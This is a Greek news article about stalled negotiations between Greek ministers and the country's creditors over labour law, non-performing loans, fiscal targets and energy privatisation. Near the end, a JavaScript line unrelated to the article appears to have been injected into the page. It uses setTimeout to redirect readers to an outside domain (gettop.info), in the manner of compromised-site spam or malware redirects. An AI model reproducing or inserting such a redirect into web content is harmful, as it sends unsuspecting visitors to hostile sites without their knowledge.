Χάσμα πριν το EuroWorkingGroup σε εργασιακά, κόκκινα δάνεια, δημοσιονομικά, ενεργειακά

0
4

Χωρίς αποτέλεσμα ολοκληρώθηκε η χθεσινή τρίωρη τηλεδιάσκεψη των κ.κ. Τσακαλώτου, Χουλιαράκη, Αχτσιόγλου, Σταθάκη και Παπαδημητρίου με τους θεσμούς καθώς για άλλη μια φορά συμφώνησαν ότι διαφωνούν. Ανοικτά παραμένουν σημαντικά θέματα με κυριότερο τα εργασιακά, αλλά και τα «κόκκινα δάνεια», δημοσιονομικά και ενεργειακά θέματα.

Κυβερνητική πηγή που μετείχε στην σύσκεψη, ανέφερε πως και σήμερα, Κυριακή θα έχουν σύσκεψη τα τεχνικά κλιμάκια με σκοπό να επιτευχθεί κάποια προσέγγιση, αλλά δεν προβλέπεται να υπάρξει συμφωνία μέχρι την Δευτέρα.

«Από Τρίτη και μετά θα κλείσουν αρκετά θέματα» ανέφερε χαρακτηριστικά.

Σύμφωνα με όσα ανέφεραν πηγές της κυβέρνησης:

1.Στα εργασιακά: οι δανειστές επιμένουν σε ακραίες θέσεις και η κυβέρνηση αντιστέκεται. «Θα συνεχίζουμε να προβάλλουμε τις απόψεις μας έως ότου δούμε ότι και οι δανειστές περάσουν στη διαδικασία της διαπραγμάτευσης. Γιατί έως τώρα δεν το έχουμε δει» έλεγαν χαρακτηριστικά. Τη Δευτέρα οι συναντήσεις θα συνεχιστούν σε επίπεδο τεχνικών κλιμακίων.

Μέχρι τώρα, στα εργασιακά διαπιστώνεται τεράστιο χάσμα με το ΔΝΤ και μικρότερες διαφορές με τους εκπροσώπων των ευρωπαϊκών θεσμών. Η ελληνική πλευρά συνεχίζει να υπερασπίζεται την θέση της ότι οι συλλογικές διαπραγματεύσεις αποτελούν κομμάτι των βέλτιστων ευρωπαϊκών πρακτικών.

Στις ομαδικές απολύσεις οι δανειστές εμμένουν στην πλήρη απελευθέρωση. Η ελληνική πλευρά τονίζει ότι δεν πρέπει να υπάρξει καμία αλλαγή στα όρια και το καθεστώς της προέγκρισης. Η πλευρά του ΔΝΤ επιμένει επίσης στην θέσπιση του lock out.

2.Το θέμα στα Ενεργειακά είναι να ανοίξει η αγορά Ενέργειας. Ζητάνε να έχει πουληθεί το 49% του ΑΔΜΗΕ μέχρι τον Σεπτέμβριο του 2017. Πιέζουν να ανοίξουν τα μερίδια της αγοράς στην λιανική, δηλαδή ποιοι και πώς θα πουλήσουν την παραγωγή της ΔΕΗ. Ωστόσο κυβερνητικες πηγές λένε πως δεν ζητούν οι δανειστές πώλησης ποσοστού άνω του 17% της ΔΕΗ, το οποίο προορίζεται για ιδιωτικοποίηση.

3.Στα δάνεια παραμένουν τα δύο ανοικτά θέματα που θα λυθούν σε τεχνικό επίπεδο. Το βασικό είναι αν θα κουρευτούν οφειλές από ΦΠΑ και «πανωτόκια» σε δάνεια από τράπεζες. Σήμερα θα έχουν και νέα σύσκεψη τα τεχνικά κλιμάκια.
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here